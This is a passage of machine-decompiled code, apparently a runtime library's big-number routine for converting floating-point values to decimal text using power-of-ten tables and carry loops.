                                                												E001B1F5E( &_v468, 0x1cc,  &_v1396, 0);
                                                												_t1347 =  &(_t1347[0x10]);
                                                											}
                                                											_t1275 = 0x435 >> 5;
                                                											E001AAF60(0x435 >> 5,  &_v1396, 0, 0x435);
                                                											 *(_t1344 + 0xbad63d) = 1 << (0x00000435 - _v1872 & 0x0000001f);
                                                										}
                                                										goto L117;
                                                									}
                                                								}
                                                								goto L100;
                                                							}
                                                							L117:
                                                							_t843 = _t1275 + 1;
                                                							_t1323 = 0x1cc;
                                                							_v1400 = _t843;
                                                							_v936 = _t843;
                                                							E001B1F5E( &_v932, 0x1cc,  &_v1396, _t843 << 2);
                                                							_t1348 =  &(_t1347[0x1c]);
                                                							_t1122 = 1;
                                                							__eflags = 1;
                                                						} else {
                                                							_v1396 = _v1396 & 0x00000000;
                                                							_v1392 = 0x100000;
                                                							_v1400 = 2;
                                                							__eflags = _t1318;
                                                							if(_t1318 == 0) {
                                                								L57:
                                                								_t1195 = _t1229 - 0x432;
                                                								_t1196 = _t1195 & 0x0000001f;
                                                								_v1880 = _t1195 >> 5;
                                                								_v1896 = _t1196;
                                                								_v1924 = _t1272 - _t1196;
                                                								_t1045 = E001C6170(_t1122, _t1272 - _t1196, 0);
                                                								_t1258 = _v1868;
                                                								_t1046 = _t1045 - 1;
                                                								_t130 =  &_v1908;
                                                								 *_t130 = _v1908 & 0x00000000;
                                                								__eflags =  *_t130;
                                                								_v1876 = _t1046;
                                                								_t1047 =  !_t1046;
                                                								_v1920 = _t1047;
                                                								asm("bsr eax, ecx");
                                                								if( *_t130 == 0) {
                                                									_t138 =  &_v1868;
                                                									 *_t138 = _v1868 & 0x00000000;
                                                									__eflags =  *_t138;
                                                								} else {
                                                									_v1868 = _t1047 + 1;
                                                								}
                                                								_t1199 = _v1880;
                                                								_t1323 = 0x1cc;
                                                								_t1048 = _t1199 + _t1258;
                                                								__eflags = _t1048 - 0x73;
                                                								if(_t1048 <= 0x73) {
                                                									__eflags = _t1272 - _v1868 - _v1896;
                                                									asm("sbb eax, eax");
                                                									_t1051 =  ~_t1048 + _t1199 + _t1258;
                                                									_v1916 = _t1051;
                                                									__eflags = _t1051 - 0x73;
                                                									if(_t1051 > 0x73) {
                                                										goto L61;
                                                									} else {
                                                										_t1301 = _t1199 - 1;
                                                										_t1059 = _t1051 - 1;
                                                										_v1900 = _t1301;
                                                										_v1872 = _t1059;
                                                										__eflags = _t1059 - _t1301;
                                                										if(_t1059 != _t1301) {
                                                											_t1305 = _t1059 - _t1199;
                                                											__eflags = _t1305;
                                                											_t1202 =  &(( &_v472)[_t1305]);
                                                											_v1892 = _t1202;
                                                											while(1) {
                                                												__eflags = _t1305 - _t1258;
                                                												if(_t1305 >= _t1258) {
                                                													_t1063 = 0;
                                                													__eflags = 0;
                                                												} else {
                                                													_t1063 = _t1202[1];
                                                												}
                                                												_v1868 = _t1063;
                                                												_t158 = _t1305 - 1; // -4
                                                												__eflags = _t158 - _t1258;
                                                												if(_t158 >= _t1258) {
                                                													_t1065 = 0;
                                                													__eflags = 0;
                                                												} else {
                                                													_t1065 =  *_t1202;
                                                												}
                                                												_t1205 = _v1872;
                                                												 *(_t1344 + _t1205 * 4 - 0x1d0) = (_t1065 & _v1920) >> _v1924 | (_v1868 & _v1876) << _v1896;
                                                												_t1070 = _t1205 - 1;
                                                												_t1202 = _v1892 - 4;
                                                												_v1872 = _t1070;
                                                												_t1305 = _t1305 - 1;
                                                												_v1892 = _t1202;
                                                												__eflags = _t1070 - _v1900;
                                                												if(_t1070 == _v1900) {
                                                													break;
                                                												}
                                                												_t1258 = _v472;
                                                											}
                                                											_t1199 = _v1880;
                                                										}
                                                										__eflags = _t1199;
                                                										if(_t1199 != 0) {
                                                											__eflags = 0;
                                                											memset( &_v468, 0, _t1199 << 2);
                                                											_t1347 =  &(_t1347[0xc]);
                                                										}
                                                										_v472 = _v1916;
                                                									}
                                                								} else {
                                                									L61:
                                                									_v1400 = 0;
                                                									_v472 = 0;
                                                									E001B1F5E( &_v468, _t1323,  &_v1396, 0);
                                                									_t1347 =  &(_t1347[0x10]);
                                                								}
                                                								_v1396 = 2;
                                                								_push(4);
                                                							} else {
                                                								_t1207 = 0;
                                                								__eflags = 0;
                                                								while(1) {
                                                									__eflags =  *((intOrPtr*)(_t1344 + _t1207 - 0x570)) -  *((intOrPtr*)(_t1344 + _t1207 - 0x1d0));
                                                									if( *((intOrPtr*)(_t1344 + _t1207 - 0x570)) !=  *((intOrPtr*)(_t1344 + _t1207 - 0x1d0))) {
                                                										goto L57;
                                                									}
                                                									_t1207 = _t1207 + 4;
                                                									__eflags = _t1207 - 8;
                                                									if(_t1207 != 8) {
                                                										continue;
                                                									} else {
                                                										_t1208 = _t1229 - 0x431;
                                                										_t1209 = _t1208 & 0x0000001f;
                                                										_v1880 = _t1208 >> 5;
                                                										_v1896 = _t1209;
                                                										_v1876 = _t1272 - _t1209;
                                                										_t1076 = E001C6170(_t1122, _t1272 - _t1209, 0);
                                                										_t1263 = _v1868;
                                                										_t1077 = _t1076 - 1;
                                                										_t70 =  &_v1908;
                                                										 *_t70 = _v1908 & 0x00000000;
                                                										__eflags =  *_t70;
                                                										_v1900 = _t1077;
                                                										_t1078 =  !_t1077;
                                                										_v1924 = _t1078;
                                                										asm("bsr eax, ecx");
                                                										if( *_t70 == 0) {
                                                											_t78 =  &_v1868;
                                                											 *_t78 = _v1868 & 0x00000000;
                                                											__eflags =  *_t78;
                                                										} else {
                                                											_v1868 = _t1078 + 1;
                                                										}
                                                										_t1212 = _v1880;
                                                										_t1323 = 0x1cc;
                                                										_t1079 = _t1212 + _t1263;
                                                										__eflags = _t1079 - 0x73;
                                                										if(_t1079 <= 0x73) {
                                                											__eflags = _t1272 - _v1868 - _v1896;
                                                											asm("sbb eax, eax");
                                                											_t1082 =  ~_t1079 + _t1212 + _t1263;
                                                											_v1920 = _t1082;
                                                											__eflags = _t1082 - 0x73;
                                                											if(_t1082 > 0x73) {
                                                												goto L39;
                                                											} else {
                                                												_t1307 = _t1212 - 1;
                                                												_t1088 = _t1082 - 1;
                                                												_v1916 = _t1307;
                                                												_v1872 = _t1088;
                                                												__eflags = _t1088 - _t1307;
                                                												if(_t1088 != _t1307) {
                                                													_t1311 = _t1088 - _t1212;
                                                													__eflags = _t1311;
                                                													_t1215 =  &(( &_v472)[_t1311]);
                                                													_v1892 = _t1215;
                                                													while(1) {
                                                														__eflags = _t1311 - _t1263;
                                                														if(_t1311 >= _t1263) {
                                                															_t1092 = 0;
                                                															__eflags = 0;
                                                														} else {
                                                															_t1092 = _t1215[1];
                                                														}
                                                														_v1868 = _t1092;
                                                														_t98 = _t1311 - 1; // -4
                                                														__eflags = _t98 - _t1263;
                                                														if(_t98 >= _t1263) {
                                                															_t1094 = 0;
                                                															__eflags = 0;
                                                														} else {
                                                															_t1094 =  *_t1215;
                                                														}
                                                														_t1218 = _v1872;
                                                														 *(_t1344 + _t1218 * 4 - 0x1d0) = (_t1094 & _v1924) >> _v1876 | (_v1868 & _v1900) << _v1896;
                                                														_t1099 = _t1218 - 1;
                                                														_t1215 = _v1892 - 4;
                                                														_v1872 = _t1099;
                                                														_t1311 = _t1311 - 1;
                                                														_v1892 = _t1215;
                                                														__eflags = _t1099 - _v1916;
                                                														if(_t1099 == _v1916) {
                                                															break;
                                                														}
                                                														_t1263 = _v472;
                                                													}
                                                													_t1212 = _v1880;
                                                												}
                                                												__eflags = _t1212;
                                                												if(_t1212 != 0) {
                                                													__eflags = 0;
                                                													memset( &_v468, 0, _t1212 << 2);
                                                													_t1347 =  &(_t1347[0xc]);
                                                												}
                                                												_v472 = _v1920;
                                                											}
                                                										} else {
                                                											L39:
                                                											_v1400 = 0;
                                                											_v472 = 0;
                                                											E001B1F5E( &_v468, _t1323,  &_v1396, 0);
                                                											_t1347 =  &(_t1347[0x10]);
                                                										}
                                                										_t1087 = 4;
                                                										_v1396 = _t1087;
                                                										_push(_t1087);
                                                									}
                                                									goto L56;
                                                								}
                                                								goto L57;
                                                							}
                                                							L56:
                                                							_v1392 = _v1392 & 0x00000000;
                                                							_push( &_v1396);
                                                							_v936 = _t1122;
                                                							_push(_t1323);
                                                							_push( &_v932);
                                                							_v1400 = _t1122;
                                                							E001B1F5E();
                                                							_t1348 =  &(_t1347[0x10]);
                                                						}
                                                						_t848 = _v1904;
                                                						_t1149 = 0xa;
                                                						_v1924 = _t1149;
                                                						__eflags = _t848;
                                                						if(_t848 < 0) {
                                                							_t849 =  ~_t848;
                                                							_t850 = _t849 / _t1149;
                                                							_v1916 = _t850;
                                                							_t1150 = _t849 % _t1149;
                                                							_v1908 = _t1150;
                                                							__eflags = _t850;
                                                							if(_t850 == 0) {
                                                								L250:
                                                								__eflags = _t1150;
                                                								if(_t1150 != 0) {
                                                									_t896 =  *(0x1ca144 + _t1150 * 4);
                                                									_v1908 = _t896;
                                                									__eflags = _t896;
                                                									if(_t896 == 0) {
                                                										L262:
                                                										__eflags = 0;
                                                										_push(0);
                                                										_v472 = 0;
                                                										_v2420 = 0;
                                                										goto L263;
                                                									} else {
                                                										__eflags = _t896 - _t1122;
                                                										if(_t896 != _t1122) {
                                                											_t1165 = _v472;
                                                											__eflags = _t1165;
                                                											if(_t1165 != 0) {
                                                												_v1876 = _v1876 & 0x00000000;
                                                												_t1282 = 0;
                                                												__eflags = 0;
                                                												do {
                                                													_t1244 = _t896 *  *(_t1344 + _t1282 * 4 - 0x1d0) >> 0x20;
                                                													 *(_t1344 + _t1282 * 4 - 0x1d0) = _t896 *  *(_t1344 + _t1282 * 4 - 0x1d0) + _v1876;
                                                													_t896 = _v1908;
                                                													asm("adc edx, 0x0");
                                                													_t1282 = _t1282 + 1;
                                                													_v1876 = _t1244;
                                                													__eflags = _t1282 - _t1165;
                                                												} while (_t1282 != _t1165);
                                                												__eflags = _t1244;
                                                												if(_t1244 != 0) {
                                                													_t903 = _v472;
                                                													__eflags = _t903 - 0x73;
                                                													if(_t903 >= 0x73) {
                                                														goto L262;
                                                													} else {
                                                														 *(_t1344 + _t903 * 4 - 0x1d0) = _t1244;
                                                														_v472 = _v472 + 1;
                                                													}
                                                												}
                                                											}
                                                										}
                                                									}
                                                								}
                                                							} else {
                                                								do {
                                                									__eflags = _t850 - 0x26;
                                                									if(_t850 > 0x26) {
                                                										_t850 = 0x26;
                                                									}
                                                									_t1166 =  *(0x1ca0ae + _t850 * 4) & 0x000000ff;
                                                									_v1880 = _t850;
                                                									_v1400 = ( *(0x1ca0af + _t850 * 4) & 0x000000ff) + ( *(0x1ca0ae + _t850 * 4) & 0x000000ff);
                                                									E001AAF60(_t1166 << 2,  &_v1396, 0, _t1166 << 2);
                                                									_t914 = E001AA810( &(( &_v1396)[_t1166]), 0x1c97a8 + ( *(0x1ca0ac + _v1880 * 4) & 0x0000ffff) * 4, ( *(0x1ca0af + _t850 * 4) & 0x000000ff) << 2);
                                                									_t1245 = _v1400;
                                                									_t1348 =  &(_t1348[0x18]);
                                                									_v1872 = _t1245;
                                                									__eflags = _t1245 - _t1122;
                                                									if(_t1245 > _t1122) {
                                                										__eflags = _v472 - _t1122;
                                                										if(_v472 > _t1122) {
                                                											__eflags = _t1245 - _v472;
                                                											_t1326 =  &_v1396;
                                                											_t547 = _t1245 - _v472 > 0;
                                                											__eflags = _t547;
                                                											_t915 = _t914 & 0xffffff00 | _t547;
                                                											if(_t547 >= 0) {
                                                												_t1326 =  &_v468;
                                                											}
                                                											_v1892 = _t1326;
                                                											__eflags = _t915;
                                                											if(_t915 == 0) {
                                                												_v1896 = _t1245;
                                                												_t1245 = _v472;
                                                												_v1872 = _t1245;
                                                												_v1876 =  &_v1396;
                                                											} else {
                                                												_v1896 = _v472;
                                                												_v1876 =  &_v468;
                                                											}
                                                											_t917 = 0;
                                                											_t1285 = 0;
                                                											_v1864 = 0;
                                                											__eflags = _t1245;
                                                											if(_t1245 == 0) {
                                                												L244:
                                                												_v472 = _t917;
                                                												_t1323 = 0x1cc;
                                                												_t918 = _t917 << 2;
                                                												__eflags = _t918;
                                                												_push(_t918);
                                                												_t919 =  &_v1860;
                                                												goto L245;
                                                											} else {
                                                												do {
                                                													__eflags =  *(_t1326 + _t1285 * 4);
                                                													if( *(_t1326 + _t1285 * 4) != 0) {
                                                														_t1167 = 0;
                                                														_t1327 = _t1285;
                                                														_v1868 = 0;
                                                														_v1900 = 0;
                                                														__eflags = _v1896;
                                                														if(_v1896 != 0) {
                                                															_t1246 = 0;
                                                															while(1) {
                                                																__eflags = _t1327 - 0x73;
                                                																if(_t1327 == 0x73) {
                                                																	break;
                                                																}
                                                																__eflags = _t1327 - _t917;
                                                																if(_t1327 == _t917) {
                                                																	 *(_t1344 + _t1327 * 4 - 0x740) =  *(_t1344 + _t1327 * 4 - 0x740) & 0x00000000;
                                                																	_t579 = _t1285 + 1; // 0x1
                                                																	_t934 = _t579 + _t1167;
                                                																	__eflags = _t934;
                                                																	_v1864 = _t934;
                                                																}
                                                																_t930 =  *(_v1876 + _t1167 * 4);
                                                																_t1170 = _v1892;
                                                																_t1246 = _t930 *  *(_t1170 + _t1285 * 4) >> 0x20;
                                                																asm("adc edx, 0x0");
                                                																 *(_t1344 + _t1327 * 4 - 0x740) =  *(_t1344 + _t1327 * 4 - 0x740) + _t930 *  *(_t1170 + _t1285 * 4) + _v1868;
                                                																_t917 = _v1864;
                                                																asm("adc edx, 0x0");
                                                																_t1167 = _v1900 + 1;
                                                																_t1327 = _t1327 + 1;
                                                																_v1868 = _t1246;
                                                																_v1900 = _t1167;
                                                																__eflags = _t1167 - _v1896;
                                                																if(_t1167 != _v1896) {
                                                																	continue;
                                                																}
                                                																break;
                                                															}
                                                															__eflags = _t1246;
                                                															if(_t1246 != 0) {
                                                																_t1169 =  &_v1860 + _t1327 * 4;
                                                																_v1868 = _t1169;
                                                																while(1) {
                                                																	__eflags = _t1327 - 0x73;
                                                																	if(_t1327 == 0x73) {
                                                																		goto L240;
                                                																	}
                                                																	__eflags = _t1327 - _t917;
                                                																	if(_t1327 == _t917) {
                                                																		 *_t1169 =  *_t1169 & 0x00000000;
                                                																		__eflags =  *_t1169;
                                                																		_t609 = _t1327 + 1; // 0x1
                                                																		_v1864 = _t609;
                                                																	}
                                                																	_v1868 = _v1868 + 4;
                                                																	_t928 = _t1246;
                                                																	_t1327 = _t1327 + 1;
                                                																	_t1246 = 0;
                                                																	 *_t1169 =  *_t1169 + _t928;
                                                																	__eflags =  *_t1169;
                                                																	_t917 = _v1864;
                                                																	asm("adc edx, edx");
                                                																	if( *_t1169 != 0) {
                                                																		_t1169 = _v1868;
                                                																		continue;
                                                																	}
                                                																	goto L240;
                                                																}
                                                															}
                                                															L240:
                                                															_t1245 = _v1872;
                                                														}
                                                														__eflags = _t1327 - 0x73;
                                                														if(_t1327 == 0x73) {
                                                															_t1323 = 0x1cc;
                                                															goto L260;
                                                														} else {
                                                															_t1326 = _v1892;
                                                															goto L243;
                                                														}
                                                													} else {
                                                														__eflags = _t1285 - _t917;
                                                														if(_t1285 == _t917) {
                                                															 *(_t1344 + _t1285 * 4 - 0x740) =  *(_t1344 + _t1285 * 4 - 0x740) & 0x00000000;
                                                															_t568 = _t1285 + 1; // 0x1
                                                															_t917 = _t568;
                                                															_v1864 = _t917;
                                                														}
                                                														goto L243;
                                                													}
                                                													goto L247;
                                                													L243:
                                                													_t1285 = _t1285 + 1;
                                                													__eflags = _t1285 - _t1245;
                                                												} while (_t1285 != _t1245);
                                                												goto L244;
                                                											}
                                                										} else {
                                                											_t1286 = _v468;
                                                											_t1323 = 0x1cc;
                                                											_v1936 = _t1286;
                                                											_v472 = _t1245;
                                                											E001B1F5E( &_v468, 0x1cc,  &_v1396, _t1245 << 2);
                                                											_t1348 =  &(_t1348[0x10]);
                                                											__eflags = _t1286;
                                                											if(_t1286 != 0) {
                                                												__eflags = _t1286 - _t1122;
                                                												if(_t1286 == _t1122) {
                                                													goto L246;
                                                												} else {
                                                													__eflags = _v472;
                                                													if(_v472 == 0) {
                                                														goto L246;
                                                													} else {
                                                														_t1174 = 0;
                                                														_v1920 = _v472;
                                                														_t1287 = 0;
                                                														__eflags = 0;
                                                														do {
                                                															_t942 = _v1936;
                                                															_t1247 = _t942 *  *(_t1344 + _t1287 * 4 - 0x1d0) >> 0x20;
                                                															 *(_t1344 + _t1287 * 4 - 0x1d0) = _t942 *  *(_t1344 + _t1287 * 4 - 0x1d0) + _t1174;
                                                															asm("adc edx, 0x0");
                                                															_t1287 = _t1287 + 1;
                                                															_t1174 = _t1247;
                                                															__eflags = _t1287 - _v1920;
                                                														} while (_t1287 != _v1920);
                                                														__eflags = _t1174;
                                                														if(_t1174 == 0) {
                                                															goto L246;
                                                														} else {
                                                															_t945 = _v472;
                                                															__eflags = _t945 - 0x73;
                                                															if(_t945 >= 0x73) {
                                                																L260:
                                                																_v2420 = 0;
                                                																_v472 = 0;
                                                																E001B1F5E( &_v468, _t1323,  &_v2416, 0);
                                                																_t1348 =  &(_t1348[0x10]);
                                                																_t922 = 0;
                                                															} else {
                                                																 *(_t1344 + _t945 * 4 - 0x1d0) = _t1174;
                                                																_v472 = _v472 + 1;
                                                																goto L246;
                                                															}
                                                														}
                                                													}
                                                												}
                                                											} else {
                                                												_v2420 = 0;
                                                												_v472 = 0;
                                                												_push(0);
                                                												_t919 =  &_v2416;
                                                												L245:
                                                												_push(_t919);
                                                												_push(_t1323);
                                                												_push( &_v468);
                                                												E001B1F5E();
                                                												_t1348 =  &(_t1348[0x10]);
                                                												L246:
                                                												_t922 = _t1122;
                                                											}
                                                										}
                                                									} else {
                                                										_t1288 = _v1396;
                                                										__eflags = _t1288;
                                                										if(_t1288 != 0) {
                                                											__eflags = _t1288 - _t1122;
                                                											if(_t1288 == _t1122) {
                                                												goto L198;
                                                											} else {
                                                												__eflags = _v472;
                                                												if(_v472 == 0) {
                                                													goto L198;
                                                												} else {
                                                													_t1175 = 0;
                                                													_v1936 = _v472;
                                                													_t1328 = 0;
                                                													__eflags = 0;
                                                													do {
                                                														_t948 = _t1288;
                                                														_t1248 = _t948 *  *(_t1344 + _t1328 * 4 - 0x1d0) >> 0x20;
                                                														 *(_t1344 + _t1328 * 4 - 0x1d0) = _t948 *  *(_t1344 + _t1328 * 4 - 0x1d0) + _t1175;
                                                														asm("adc edx, 0x0");
                                                														_t1328 = _t1328 + 1;
                                                														_t1175 = _t1248;
                                                														__eflags = _t1328 - _v1936;
                                                													} while (_t1328 != _v1936);
                                                													__eflags = _t1175;
                                                													if(_t1175 == 0) {
                                                														goto L198;
                                                													} else {
                                                														_t951 = _v472;
                                                														__eflags = _t951 - 0x73;
                                                														if(_t951 >= 0x73) {
                                                															_v2420 = 0;
                                                															_v472 = 0;
                                                															E001B1F5E( &_v468, 0x1cc,  &_v2416, 0);
                                                															_t1348 =  &(_t1348[0x10]);
                                                															_t922 = 0;
                                                															goto L199;
                                                														} else {
                                                															 *(_t1344 + _t951 * 4 - 0x1d0) = _t1175;
                                                															_v472 = _v472 + 1;
                                                															goto L198;
                                                														}
                                                													}
                                                												}
                                                											}
                                                											goto L265;
                                                										} else {
                                                											__eflags = 0;
                                                											_v2420 = 0;
                                                											_v472 = 0;
                                                											E001B1F5E( &_v468, 0x1cc,  &_v2416, 0);
                                                											_t1348 =  &(_t1348[0x10]);
                                                											L198:
                                                											_t922 = _t1122;
                                                										}
                                                										L199:
                                                										_t1323 = 0x1cc;
                                                									}
                                                									L247:
                                                									__eflags = _t922;
                                                									if(_t922 == 0) {
                                                										_v2420 = _v2420 & 0x00000000;
                                                										_v472 = _v472 & 0x00000000;
                                                										_push(0);
                                                										L263:
                                                										_push( &_v2416);
                                                										_t899 =  &_v468;
                                                										goto L264;
                                                									} else {
                                                										goto L248;
                                                									}
                                                									goto L265;
                                                									L248:
                                                									_t850 = _v1916 - _v1880;
                                                									__eflags = _t850;
                                                									_v1916 = _t850;
                                                								} while (_t850 != 0);
                                                								_t1150 = _v1908;
                                                								goto L250;
                                                							}
                                                						} else {
                                                							_t960 = _t848 / _t1149;
                                                							_v1876 = _t960;
                                                							_t1176 = _t848 % _t1149;
                                                							_v1936 = _t1176;
                                                							__eflags = _t960;
                                                							if(_t960 == 0) {
                                                								L178:
                                                								__eflags = _t1176;
                                                								if(_t1176 != 0) {
                                                									_t961 =  *(0x1ca144 + _t1176 * 4);
                                                									_v1936 = _t961;
                                                									__eflags = _t961;
                                                									if(_t961 != 0) {
                                                										__eflags = _t961 - _t1122;
                                                										if(_t961 != _t1122) {
                                                											_t1177 = _v936;
                                                											__eflags = _t1177;
                                                											if(_t1177 != 0) {
                                                												_v1876 = _v1876 & 0x00000000;
                                                												_t1289 = 0;
                                                												__eflags = 0;
                                                												do {
                                                													_t1250 = _t961 *  *(_t1344 + _t1289 * 4 - 0x3a0) >> 0x20;
                                                													 *(_t1344 + _t1289 * 4 - 0x3a0) = _t961 *  *(_t1344 + _t1289 * 4 - 0x3a0) + _v1876;
                                                													_t961 = _v1936;
                                                													asm("adc edx, 0x0");
                                                													_t1289 = _t1289 + 1;
                                                													_v1876 = _t1250;
                                                													__eflags = _t1289 - _t1177;
                                                												} while (_t1289 != _t1177);
                                                												__eflags = _t1250;
                                                												if(_t1250 != 0) {
                                                													_t964 = _v936;
                                                													__eflags = _t964 - 0x73;
                                                													if(_t964 >= 0x73) {
                                                														goto L180;
                                                													} else {
                                                														 *(_t1344 + _t964 * 4 - 0x3a0) = _t1250;
                                                														_v936 = _v936 + 1;
                                                													}
                                                												}
                                                											}
                                                										}
                                                									} else {
                                                										L180:
                                                										_v2420 = 0;
                                                										_v936 = 0;
                                                										_push(0);
                                                										goto L184;
                                                									}
                                                								}
                                                							} else {
                                                								do {
                                                									__eflags = _t960 - 0x26;
                                                									if(_t960 > 0x26) {
                                                										_t960 = 0x26;
                                                									}
                                                									_t1178 =  *(0x1ca0ae + _t960 * 4) & 0x000000ff;
                                                									_v1868 = _t960;
                                                									_v1400 = ( *(0x1ca0af + _t960 * 4) & 0x000000ff) + ( *(0x1ca0ae + _t960 * 4) & 0x000000ff);
                                                									E001AAF60(_t1178 << 2,  &_v1396, 0, _t1178 << 2);
                                                									_t977 = E001AA810( &(( &_v1396)[_t1178]), 0x1c97a8 + ( *(0x1ca0ac + _v1868 * 4) & 0x0000ffff) * 4, ( *(0x1ca0af + _t960 * 4) & 0x000000ff) << 2);
                                                									_t1251 = _v1400;
                                                									_t1348 =  &(_t1348[0x18]);
                                                									_v1872 = _t1251;
                                                									__eflags = _t1251 - _t1122;
                                                									if(_t1251 > _t1122) {
                                                										__eflags = _v936 - _t1122;
                                                										if(_v936 > _t1122) {
                                                											__eflags = _t1251 - _v936;
                                                											_t1330 =  &_v1396;
                                                											_t340 = _t1251 - _v936 > 0;
                                                											__eflags = _t340;
                                                											_t978 = _t977 & 0xffffff00 | _t340;
                                                											if(_t340 >= 0) {
                                                												_t1330 =  &_v932;
                                                											}
                                                											_v1896 = _t1330;
                                                											__eflags = _t978;
                                                											if(_t978 == 0) {
                                                												_v1892 = _t1251;
                                                												_t1251 = _v936;
                                                												_v1872 = _t1251;
                                                												_v1916 =  &_v1396;
                                                											} else {
                                                												_v1892 = _v936;
                                                												_v1916 =  &_v932;
                                                											}
                                                											_t980 = 0;
                                                											_t1292 = 0;
                                                											_v1864 = 0;
                                                											__eflags = _t1251;
                                                											if(_t1251 == 0) {
                                                												L172:
                                                												_v936 = _t980;
                                                												_t1323 = 0x1cc;
                                                												_t981 = _t980 << 2;
                                                												__eflags = _t981;
                                                												_push(_t981);
                                                												_t982 =  &_v1860;
                                                												goto L173;
                                                											} else {
                                                												do {
                                                													__eflags =  *(_t1330 + _t1292 * 4);
                                                													if( *(_t1330 + _t1292 * 4) != 0) {
                                                														_t1179 = 0;
                                                														_t1331 = _t1292;
                                                														_v1880 = 0;
                                                														_v1900 = 0;
                                                														__eflags = _v1892;
                                                														if(_v1892 != 0) {
                                                															_t1252 = 0;
                                                															while(1) {
                                                																__eflags = _t1331 - 0x73;
                                                																if(_t1331 == 0x73) {
                                                																	break;
                                                																}
                                                																__eflags = _t1331 - _t980;
                                                																if(_t1331 == _t980) {
                                                																	 *(_t1344 + _t1331 * 4 - 0x740) =  *(_t1344 + _t1331 * 4 - 0x740) & 0x00000000;
                                                																	_t372 = _t1292 + 1; // 0x1
                                                																	_t998 = _t372 + _t1179;
                                                																	__eflags = _t998;
                                                																	_v1864 = _t998;
                                                																}
                                                																_t993 =  *(_v1916 + _t1179 * 4);
                                                																_t1182 = _v1896;
                                                																_t1252 = _t993 *  *(_t1182 + _t1292 * 4) >> 0x20;
                                                																asm("adc edx, 0x0");
                                                																 *(_t1344 + _t1331 * 4 - 0x740) = _t993 *  *(_t1182 + _t1292 * 4) +  *(_t1344 + _t1331 * 4 - 0x740) + _v1880;
                                                																_t980 = _v1864;
                                                																asm("adc edx, 0x0");
                                                																_t1179 = _v1900 + 1;
                                                																_v1880 = _t1252;
                                                																_t1331 = _t1331 + 1;
                                                																_v1900 = _t1179;
                                                																__eflags = _t1179 - _v1892;
                                                																if(_t1179 != _v1892) {
                                                																	continue;
                                                																}
                                                																break;
                                                															}
                                                															__eflags = _t1252;
                                                															if(_t1252 != 0) {
                                                																_t1181 =  &_v1860 + _t1331 * 4;
                                                																_v1880 = _t1181;
                                                																while(1) {
                                                																	__eflags = _t1331 - 0x73;
                                                																	if(_t1331 == 0x73) {
                                                																		goto L168;
                                                																	}
                                                																	__eflags = _t1331 - _t980;
                                                																	if(_t1331 == _t980) {
                                                																		 *_t1181 =  *_t1181 & 0x00000000;
                                                																		__eflags =  *_t1181;
                                                																		_t402 = _t1331 + 1; // 0x1
                                                																		_v1864 = _t402;
                                                																	}
                                                																	_v1880 = _v1880 + 4;
                                                																	_t991 = _t1252;
                                                																	_t1331 = _t1331 + 1;
                                                																	_t1252 = 0;
                                                																	 *_t1181 =  *_t1181 + _t991;
                                                																	__eflags =  *_t1181;
                                                																	_t980 = _v1864;
                                                																	asm("adc edx, edx");
                                                																	if( *_t1181 != 0) {
                                                																		_t1181 = _v1880;
                                                																		continue;
                                                																	}
                                                																	goto L168;
                                                																}
                                                															}
                                                															L168:
                                                															_t1251 = _v1872;
                                                														}
                                                														__eflags = _t1331 - 0x73;
                                                														if(_t1331 == 0x73) {
                                                															__eflags = 0;
                                                															_t1323 = 0x1cc;
                                                															_v2420 = 0;
                                                															_v936 = 0;
                                                															_push(0);
                                                															_t988 =  &_v2416;
                                                															goto L182;
                                                														} else {
                                                															_t1330 = _v1896;
                                                															goto L171;
                                                														}
                                                													} else {
                                                														__eflags = _t1292 - _t980;
                                                														if(_t1292 == _t980) {
                                                															 *(_t1344 + _t1292 * 4 - 0x740) =  *(_t1344 + _t1292 * 4 - 0x740) & 0x00000000;
                                                															_t361 = _t1292 + 1; // 0x1
                                                															_t980 = _t361;
                                                															_v1864 = _t980;
                                                														}
                                                														goto L171;
                                                													}
                                                													goto L175;
                                                													L171:
                                                													_t1292 = _t1292 + 1;
                                                													__eflags = _t1292 - _t1251;
                                                												} while (_t1292 != _t1251);
                                                												goto L172;
                                                											}
                                                										} else {
                                                											_t1293 = _v932;
                                                											_t1323 = 0x1cc;
                                                											_v1920 = _t1293;
                                                											_v936 = _t1251;
                                                											E001B1F5E( &_v932, 0x1cc,  &_v1396, _t1251 << 2);
                                                											_t1348 =  &(_t1348[0x10]);
                                                											__eflags = _t1293;
                                                											if(_t1293 != 0) {
                                                												__eflags = _t1293 - _t1122;
                                                												if(_t1293 == _t1122) {
                                                													goto L174;
                                                												} else {
                                                													__eflags = _v936;
                                                													if(_v936 == 0) {
                                                														goto L174;
                                                													} else {
                                                														_t1186 = 0;
                                                														_v1900 = _v936;
                                                														_t1294 = 0;
                                                														__eflags = 0;
                                                														do {
                                                															_t1006 = _v1920;
                                                															_t1253 = _t1006 *  *(_t1344 + _t1294 * 4 - 0x3a0) >> 0x20;
                                                															 *(_t1344 + _t1294 * 4 - 0x3a0) = _t1006 *  *(_t1344 + _t1294 * 4 - 0x3a0) + _t1186;
                                                															asm("adc edx, 0x0");
                                                															_t1294 = _t1294 + 1;
                                                															_t1186 = _t1253;
                                                															__eflags = _t1294 - _v1900;
                                                														} while (_t1294 != _v1900);
                                                														__eflags = _t1186;
                                                														if(_t1186 == 0) {
                                                															goto L174;
                                                														} else {
                                                															_t1009 = _v936;
                                                															__eflags = _t1009 - 0x73;
                                                															if(_t1009 >= 0x73) {
                                                																_v1400 = 0;
                                                																_v936 = 0;
                                                																_push(0);
                                                																_t988 =  &_v1396;
                                                																L182:
                                                																_push(_t988);
                                                																_push(_t1323);
                                                																_push( &_v932);
                                                																E001B1F5E();
                                                																_t1348 =  &(_t1348[0x10]);
                                                																_t985 = 0;
                                                															} else {
                                                																 *(_t1344 + _t1009 * 4 - 0x3a0) = _t1186;
                                                																_v936 = _v936 + 1;
                                                																goto L174;
                                                															}
                                                														}
                                                													}
                                                												}
                                                											} else {
                                                												_v1400 = 0;
                                                												_v936 = 0;
                                                												_push(0);
                                                												_t982 =  &_v1396;
                                                												L173:
                                                												_push(_t982);
                                                												_push(_t1323);
                                                												_push( &_v932);
                                                												E001B1F5E();
                                                												_t1348 =  &(_t1348[0x10]);
                                                												L174:
                                                												_t985 = _t1122;
                                                											}
                                                										}
                                                									} else {
                                                										_t1295 = _v1396;
                                                										__eflags = _t1295;
                                                										if(_t1295 != 0) {
                                                											__eflags = _t1295 - _t1122;
                                                											if(_t1295 == _t1122) {
                                                												goto L125;
                                                											} else {
                                                												__eflags = _v936;
                                                												if(_v936 == 0) {
                                                													goto L125;
                                                												} else {
                                                													_t1187 = 0;
                                                													_v1920 = _v936;
                                                													_t1332 = 0;
